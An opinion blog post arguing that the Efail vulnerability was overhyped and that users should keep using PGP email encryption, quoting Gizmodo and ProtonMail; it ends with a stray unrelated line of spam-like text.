Another security nightmare starts to unfold as a news article from Gizmodo today suggested that “if you use PGP or S/MIME for email encryption you should immediately disable it in your email client.” Why such a dire command? A vulnerability called “Efail”, discovered this morning by a group of researchers in Europe, which exposes encrypted emails in plain text. Gizmodo’s advice was basically just repeating the urging from the group of EFF researchers who originally found and disclosed the vulnerability early this morning: “Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.” This panic in the cyber security space is something we have now become all too used to.
Independent security researchers are advising people to stop using PGP, and the media is following suit. But this is a terrible idea. Even if a malicious actor could exploit this vulnerability (which would prove to be difficult), encryption is better than no encryption. This is like saying “your lock may not work, so leave your door wide open.”
The researchers reported that this is a bug with PGP, but it’s actually not a PGP issue. The vulnerability is actually an issue with the way clients view mail. The Efail vulnerability is not a cryptographic attack against the PGP encryption protocol as the EFF researchers originally reported; it’s merely a common client side content rendering vulnerability. Savvy users of email clients would have already disabled scripts and other forms of active content when rendering and decrypting email.
ProtonMail tweeted this today: “Efail is a prime example of irresponsible disclosure. There is no responsibility in hyping the story to @EFF and mainstream media and getting an irresponsible recommendation published (disable PGP), ignoring the fact that many (Enigmail, etc) are already patched.”
We all face enough legitimate cyber security issues without adding more noise here. We can’t go around encouraging consumers to turn off encryption in their email. That’s just asking for a devastating 0day. Be careful what you believe folks.
the dump labor day sale walmart cc apply